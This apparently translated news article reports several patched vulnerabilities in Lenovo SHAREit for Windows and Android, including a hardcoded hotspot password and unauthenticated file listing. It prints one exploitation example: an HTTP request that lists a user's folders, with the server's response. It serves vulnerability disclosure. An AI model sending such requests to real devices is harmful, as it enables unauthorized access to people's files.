In Lenovo software, the immutable password was sewn 12345678

Information Security Specialist Ivan Huertas of the Core Security Consulting Team was able to detect several vulnerabilities in Lenovo software for Windows and Android at once. This is about Lenovo SHAREit. One of the most notable problems (CVE-2016-1491) is that the Lenovo Windows application works with the same immutable password.

So, when receiving files using this application “over the air”, an access point is created with the password 12345678. Thus, virtually any network device can connect to such an access point.

As for other vulnerabilities, CVE-2016-1490 , for example, allows a third-party person to view files with sending an HTTP request to a server that is running Lenovo SHAREit. At the same time, the application sends files using the HTTP protocol in unencrypted form.
')

POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) Host: 192.168.173.1:2999 Connection: Keep-Alivek Accept-Encoding: gzip Content-Length: 0 HTTP/1.0 200 OK Content-Length: 2426 {"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Links", "has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Saved Games","has_thumbnail":false,"id":"C:\\Users\\admin\\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""} 

Exploitation Example for Vulnerability CVE-2016-1490

And the CVE-2016-1489 vulnerability allows an attacker to intercept network traffic, with a view of the transmitted data. In this case, the transferred files can be modified and sent to the victim's computer.

In addition, the CVE-2016-1492 vulnerability allows an attacker to use an unprotected password access point, with the interception of data that is sent at a particular point in time.

The discovered vulnerabilities are relevant for SHAREit for Android 3.0.18_ww and SHAREit for Windows 2.5.1.1. Now the company has already fixed the problem, so these vulnerabilities are irrelevant.

As for SHAREit, this program is used to transfer files between smartphones, tablets and personal computers over the wireless connection.

More information about the problem and its solution by the company can be found here . Updated software versions can be downloaded from the Lenovo website .